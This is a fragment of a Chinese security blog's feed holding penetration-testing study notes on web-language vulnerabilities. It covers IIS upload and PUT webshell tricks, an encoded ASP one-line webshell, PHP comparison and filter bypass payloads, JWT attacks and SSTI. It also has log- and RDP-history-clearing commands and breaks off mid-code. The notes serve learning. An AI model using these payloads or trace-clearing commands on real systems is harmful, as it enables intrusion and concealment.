class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">run clearlogs </span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">clearev </span></span></code></pre></div><h3 id="3389登陆记录清除"><a href="#3389登陆记录清除" class="headerlink" title="3389登陆记录清除"></a>3389登陆记录清除</h3><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">@echo off</span></span><span class="line"><span style="color: #babed8">@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f</span></span><span class="line"><span style="color: #babed8">@del "%USERPROFILE%\My Documents\Default.rdp" /a</span></span><span class="line"><span style="color: #babed8">@exit</span></span></code></pre></div>]]></content>
<summary type="html"><p> Author: <a href="https://twitter.com/Evi1cg">Evi1cg</a><br> Blog: <a href="https://evi1cg.github.io/">https://evi1cg.github.io</a></p>
<</summary>
</entry>
<entry>
<title>WEB攻防-特性漏洞</title>
<link href="https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E7%89%B9%E6%80%A7%E6%BC%8F%E6%B4%9E.html"/>
<id>https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E7%89%B9%E6%80%A7%E6%BC%8F%E6%B4%9E.html</id>
<published>2024-03-03T06:48:26.000Z</published>
<updated>2024-03-05T15:55:59.512Z</updated>
<content type="html"><![CDATA[<h3 id="ASP安全"><a href="#ASP安全" class="headerlink" title="ASP安全"></a>ASP安全</h3><ul><li>常用组合: windows+IIS+ASP+Access(sql server)</li></ul><h4 id="安全问题"><a href="#安全问题" class="headerlink" title="安全问题:"></a>安全问题:</h4><h5 id="MDB默认下载"><a href="#MDB默认下载" class="headerlink" title="MDB默认下载"></a>MDB默认下载</h5><ul><li>access数据库文件后缀名一般为asp/asa/mdb</li><li>其中, 浏览器访问asp/asa文件时, 文件会被解析执行, 访问mdb文件时会下载该文件</li><li>由此可以获取站点敏感数据</li></ul><h5 id="ASP后门植入连接"><a href="#ASP后门植入连接" class="headerlink" title="ASP后门植入连接"></a>ASP后门植入连接</h5><ul><li><p>留言板写入一句话木马:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">┼攠數畣整爠煥敵瑳∨≡┩愾</span></span></code></pre></div><ul><li>密码为a</li></ul></li><li><p>原理: 网站开启了asp解析,直接访问数据库文件会返回信息,写入一句话木马后进行连接</p></li></ul><h5 id="IIS短文件名探针安全漏洞"><a href="#IIS短文件名探针安全漏洞" class="headerlink" title="IIS短文件名探针安全漏洞"></a>IIS短文件名探针安全漏洞</h5><ul><li>原理: <ul><li>Windows系统为了兼容16位MS-DOS程序,为文件名较长的文件和文件夹生成了对应的Windows 8.3短文件名。比如文件名direct~1.asp中间有一个波浪号,这种就是短文件名了</li></ul></li><li>利用:<ul><li>使用脚本扫描网站目录造成敏感信息泄露(不同于使用字典扫描)</li></ul></li></ul><h5 id="中间件IIS文件上传解析"><a href="#中间件IIS文件上传解析" class="headerlink" title="中间件IIS文件上传解析"></a>中间件IIS文件上传解析</h5><ul><li><p>流程:发现网站存在上传点–上传asp木马–若存在文件名监测通过修改文件类型绕过检测–shell工具连接</p></li><li><p>1.jpg文件无法解析,修改为1.asp;.jpg即可绕过。或者1.jpg文件放在a.asp文件下也可进行解析</p></li></ul><h5 id="IIS配置目录读写"><a href="#IIS配置目录读写" class="headerlink" title="IIS配置目录读写"></a>IIS配置目录读写</h5><ul><li>当网站为IIS6.0且开启写入权限、开启web服务拓展WebDAV则存在此漏洞</li></ul><h6 id="put攻击"><a href="#put攻击" class="headerlink" title="put攻击"></a>put攻击</h6><ul><li>put协议,当我们浏览某个网站,访问某个资源时,如果网站存在这个资源,则会进行替换,若网站不存在这个资源,则会创建这个资源</li><li>可以用工具利用put直接写shell (桂林老兵)</li></ul><h3 id="NET项目-ASPX"><a href="#NET项目-ASPX" class="headerlink" title=".NET项目(ASPX)"></a>.NET项目(ASPX)</h3><ul><li>windows+iis+<strong>aspx</strong>+sqlserver</li></ul><h4 id="dll反编译"><a href="#dll反编译" class="headerlink" title="dll反编译"></a>dll反编译</h4><ul><li><a href="https://blog.csdn.net/weixin_34015860/article/details/93233036">几种工具反编译被编译好的DLL文件-CSDN博客</a></li><li><a href="https://github.com/icsharpcode/ILSpy">icsharpcode/ILSpy: .NET Decompiler with support for PDB generation, ReadyToRun, Metadata (&more) - cross-platform! (github.com)</a></li></ul><h4 id="未授权访问"><a href="#未授权访问" class="headerlink" title="未授权访问"></a>未授权访问</h4><ul><li>寻找未授权访问<ul><li>找哪些文件没有包含验证代码文件</li><li>验证代码文件有没有可能绕过</li></ul></li></ul><h3 id="PHP特性"><a href="#PHP特性" class="headerlink" title="PHP特性"></a>PHP特性</h3><h5 id="与"><a href="#与" class="headerlink" title="==与==="></a>==与===</h5><h6 id="弱类型对比"><a href="#弱类型对比" class="headerlink" title="==弱类型对比"></a><code>==</code>弱类型对比</h6><ul><li><p>场景1 – <em>缺陷绕过</em></p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">a</span><span style="color: #89DDFF">=</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">a</span><span style="color: #89DDFF">==$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">x</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">]){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">flag</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div><p><em>1.0 +1 1a等均可</em></p></li><li><p>场景2 – <em>MD5函数缺陷绕过</em></p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">name</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">!=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">password</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">]){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">MD5</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">name</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">])</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">==</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">MD5</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">password</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">])){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">flag</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">?</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div><ul><li><code>QNKCDZO</code>和<code>240610708</code>的MD5值均为<strong>0e</strong>开头, 会被理解为<strong>0乘10的xx次方</strong>, 结果为0, 可绕过==弱类型对比</li><li><code>name[]=1&password[]=2</code><br>数组无法md5加密, 因此两个都会变成none, 可绕过强类型对比</li></ul></li><li><p>场景3 – <em>intval缺陷绕过</em></p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">i</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">666</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">ii</span><span style="color: #89DDFF">=$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">n</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">intval</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">ii</span><span style="color: #89DDFF">)==$</span><span style="color: #BABED8">i</span><span style="color: #89DDFF">){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">flag</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #676E95; font-style: italic">// 666.0 +666</span></span></code></pre></div><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">i</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">666</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">ii</span><span style="color: #89DDFF">=$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">n</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">intval</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">ii</span><span style="color: #89DDFF">,</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">)==</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">flag</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"></span><span class="line"><span style="color: #676E95; font-style: italic">//0x29a</span></span></code></pre></div><ul><li>intval带参数<code>0</code>时会自动检测进制</li></ul></li><li><p>场景4 – <em>strpos()函数绕过</em></p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">i</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">666</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">ii</span><span style="color: #89DDFF">=$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">h</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">strpos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">ii</span><span style="color: #89DDFF">==$</span><span style="color: #BABED8">i</span><span style="color: #89DDFF">,</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">0</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">)){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">flag</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"></span><span class="line"><span style="color: #676E95; font-style: italic">//可以利用换行进行绕过(%0a)</span></span><span class="line"><span style="color: #676E95; font-style: italic">//?num=%0a666</span></span></code></pre></div></li><li><p>场景5 – <em>in_array第三个参数安全</em></p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">whitelist </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">,</span><span style="color: #F78C6C">2</span><span style="color: #89DDFF">,</span><span style="color: #F78C6C">3</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">page</span><span style="color: #89DDFF">=$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">i</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">in_array</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">page</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">whitelist</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">yes</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"></span><span class="line"><span style="color: #676E95; font-style: italic">//?i=1ex</span></span></code></pre></div><ul><li>in_array()函数不带第三个参数(或为false)时, 会采用<code>==</code>弱类型对比进行判断</li></ul></li><li><p>场景6 – <em>preg_match</em></p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">isset</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">num</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">])){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">num </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">num</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"/[</span><span style="color: #C3E88D">0-9</span><span style="color: #89DDFF">]/"</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">num</span><span style="color: #89DDFF">)){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">die</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">no no no!</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">intval</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">num</span><span style="color: #89DDFF">)){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">flag</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"></span><span class="line"><span style="color: #676E95; font-style: italic">//?num[]=1</span></span></code></pre></div><ul><li><em>preg_match只能处理字符串,如果不按规定传一个字符串,通常是传一个数组进去,这样就会报错</em></li></ul></li><li><p>场景7 – <em>str_replace无法迭代过滤</em></p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">sql</span><span style="color: #89DDFF">=$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">s</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">sql</span><span style="color: #89DDFF">=</span><span style="color: #82AAFF">str_replace</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">select</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">,</span><span style="color: #89DDFF">''</span><span style="color: #89DDFF">,$</span><span style="color: #BABED8">sql</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sql</span><span style="color: #89DDFF">;</span></span><span class="line"></span><span class="line"><span style="color: #676E95; font-style: italic">//?s=sselectelect</span></span></code></pre></div><ul><li>只能过滤一次</li></ul></li></ul><h3 id="JavaWeb项目"><a href="#JavaWeb项目" class="headerlink" title="JavaWeb项目"></a>JavaWeb项目</h3><h4 id="代码逻辑引起漏洞"><a href="#代码逻辑引起漏洞" class="headerlink" title="代码逻辑引起漏洞"></a>代码逻辑引起漏洞</h4><h5 id="上传文件时的目录遍历"><a href="#上传文件时的目录遍历" class="headerlink" title="上传文件时的目录遍历"></a>上传文件时的目录遍历</h5><ul><li>web应用可能设置了在上传文件文件的目录禁止执行asp,php文件等(如imgs目录等)</li><li>如果将文件上传到程序根目录, 则可以被执行</li><li>如果过滤逻辑使用的是str_replace, 则只会过滤一次, 可以双写绕过,如<code>....//file.asp</code></li></ul><h5 id="身份认证绕过"><a href="#身份认证绕过" class="headerlink" title="身份认证绕过"></a>身份认证绕过</h5><ul><li>键值逻辑:使用键名键值进行对比验证错误</li><li>如: 需要验证s0, s1, s2, s3中任意一个的信息是否正确, 如果此时传入不存在的s10086, 并赋值为null, 则可以绕过验证</li></ul><h5 id="访问控制漏洞"><a href="#访问控制漏洞" class="headerlink" title="访问控制漏洞"></a>访问控制漏洞</h5><ul><li>查看隐藏属性: 已在前端源码, 只是没有显示在屏幕上</li></ul><h4 id="JWT攻击"><a href="#JWT攻击" class="headerlink" title="JWT攻击"></a>JWT攻击</h4><p><em><a href="https://www.cnblogs.com/yokan/p/14468030.html">JWT原理及常见攻击方式 - yokan - 博客园 (cnblogs.com)</a></em></p><h5 id="JWT样式"><a href="#JWT样式" class="headerlink" title="JWT样式"></a>JWT样式</h5><p>jwt的生成token格式如下,即:<strong>由 <code>.</code> 连接的三段字符串组成</strong></p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c</span></span><span class="line"><span style="color: #babed8"></span></span></code></pre></div><ul><li><p>第一段<strong>HEADER</strong>部分, 固定包含<strong>算法</strong>和token类型,对此json进行base64url加密</p><div class="language-json"><button title="Copy code" class="copy"></button><span class="lang">json</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C792EA">alg</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HS256</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C792EA">typ</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">JWT</span><span style="color: #89DDFF">"</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div></li><li><p>第二段<strong>PAYLOAD</strong>部分, 包含一些数据,对此json进行base64url加密</p><div class="language-json"><button title="Copy code" class="copy"></button><span class="lang">json</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C792EA">sub</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">1234567890</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C792EA">name</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">John Doe</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C792EA">iat</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">1516239022</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div></li><li><p>第三段<strong>SIGNATURE</strong>部分,把前两段的base密文通过<code>.</code>拼接起来,然后对其进行<code>HS256</code>加密,再然后对<code>hs256</code>密文进行base64url加密,最终得到token的第三段</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">base64url(HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), your-256-bit-secret (秘钥加盐)))</span></span></code></pre></div></li></ul><h5 id="几种攻击思路"><a href="#几种攻击思路" class="headerlink" title="几种攻击思路"></a>几种攻击思路</h5><ul><li><p>签名没验证空加密</p><ul><li>如果签名<code>alg</code>的值可以none, 也就是不加密签名, 签名的值就可以为空</li></ul></li><li><p>爆破密匙</p><ul><li>爆破前提:<ul><li>知悉JWT使用的加密算法</li><li>一段有效的、已签名的token</li><li>签名用的密钥不复杂(弱密钥)</li></ul></li><li>爆破工具<ul><li><a href="https://github.com/brendan-rius/c-jwt-cracker">brendan-rius/c-jwt-cracker: JWT brute force cracker written in C (github.com)</a></li></ul></li></ul></li><li><p>KID利用</p><ul><li><p><code>kid</code>是jwt header中的一个可选参数,全称是<code>key ID</code>,它用于指定加密算法的密钥</p><div class="language-json"><button title="Copy code" class="copy"></button><span class="lang">json</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C792EA">alg</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HS256</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C792EA">typ</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">jwt</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C792EA">kid</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">/home/jwt/.ssh/pem</span><span style="color: #89DDFF">"</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div></li></ul></li></ul><h4 id="组件安全问题"><a href="#组件安全问题" class="headerlink" title="组件安全问题"></a>组件安全问题</h4><ul><li><p>Java项目本身安全性较高, 漏洞较少, 安全问题很多出自组件</p></li><li><p>如XStream的<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7285">CVE-2013-7285</a></p></li></ul><h3 id="JS项目-Node-Js框架"><a href="#JS项目-Node-Js框架" class="headerlink" title="JS项目&Node.Js框架"></a>JS项目&Node.Js框架</h3><h4 id="特性"><a href="#特性" class="headerlink" title="特性"></a>特性</h4><ul><li>默认能够得到源码, 相当于白盒测试</li></ul><h4 id="Js渗透测试"><a href="#Js渗透测试" class="headerlink" title="Js渗透测试"></a>Js渗透测试</h4><ul><li>在Javascript中也存在变量和函数,当存在可控变量及函数调用即可参数漏洞</li></ul><h4 id="判断js开发框架-nodejs-vue等"><a href="#判断js开发框架-nodejs-vue等" class="headerlink" title="判断js开发框架(nodejs, vue等)"></a>判断js开发框架(nodejs, vue等)</h4><ul><li>插件wappalyzer</li><li>cookie中有connect.sid</li><li>查看源代码</li><li>引入多个文件</li><li>文件结构如/static/js/app.js</li></ul><h4 id="安全漏洞"><a href="#安全漏洞" class="headerlink" title="安全漏洞"></a>安全漏洞</h4><ul><li>前端验证<ul><li>在前端通过返回状态码验证用户信息</li><li>可以被通过抓取返回数据包绕过</li></ul></li><li>url泄露</li><li>未授权访问</li></ul><h4 id="vulhub靶场"><a href="#vulhub靶场" class="headerlink" title="vulhub靶场"></a>vulhub靶场</h4><ul><li><p><a href="https://github.com/vulhub/vulhub">vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose (github.com)</a></p></li><li><p>启用靶场:</p><ul><li>进入指定漏洞的目录下如<code>httpd/CVE-xxxx-xxxxx</code></li><li>开启漏洞环境<code>docker compose up -d</code>(或<code>docker-compose</code>)</li><li>查看端口<code>docker compose ps</code></li></ul></li><li><p>关闭靶场</p><ul><li><code>docker compose down</code></li></ul></li></ul><h3 id="Python"><a href="#Python" class="headerlink" title="Python"></a>Python</h3><h4 id="反编译"><a href="#反编译" class="headerlink" title="反编译"></a>反编译</h4><ul><li><p>py文件编译后产生pyc文件</p></li><li><p>反编译平台:</p><ul><li><a href="https://tool.lu/pyc/">python反编译 - 在线工具 (tool.lu)</a></li><li><a href="http://tools.bugscaner.com/decompyle/">在线pyc,pyo,python,py文件反编译,目前支持python1.5到3.6版本的反编译-在线工具 (bugscaner.com)</a></li></ul></li><li><p>反编译工具</p><p><a href="https://github.com/zrax/pycdc">zrax/pycdc: C++ python bytecode disassembler and decompiler (github.com)</a></p></li></ul><h4 id="SSTI漏洞"><a href="#SSTI漏洞" class="headerlink" title="SSTI漏洞"></a>SSTI漏洞</h4><p><a href="https://blog.csdn.net/2301_77485708/article/details/132467976">【网络安全 | 1.5w字总结】SSTI漏洞入门,这一篇就够了。-CSDN博客</a></p><p><a href="https://www.cnblogs.com/bmjoker/p/13508538.html">1. SSTI(模板注入)漏洞(入门篇) - bmjoker - 博客园 (cnblogs.com)</a></p><ul><li>在<strong>多种编程语言</strong>都有这个漏洞(py, js, go, java)等</li></ul><h5 id="SSTI-–-服务器端模板注入漏洞"><a href="#SSTI-–-服务器端模板注入漏洞" class="headerlink" title="SSTI – 服务器端模板注入漏洞"></a>SSTI – 服务器端模板注入漏洞</h5><ul><li><p>原理: 服务端将输入作为web应用模板内容的一部分,在进行目标编译渲染的过程中,拼接了恶意语句,因此造成敏感信息泄露、远程命令执行等问题</p></li><li><p>分类:<br><img src="https://i0.imgs.ovh/2024/03/04/OYrRD.png" alt="OYrRD.png"></p></li><li><p>检测: 参数提交代码, 是否执行</p></li><li><p>案例: </p><div class="language-python"><button title="Copy code" class="copy"></button><span class="lang">python</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span 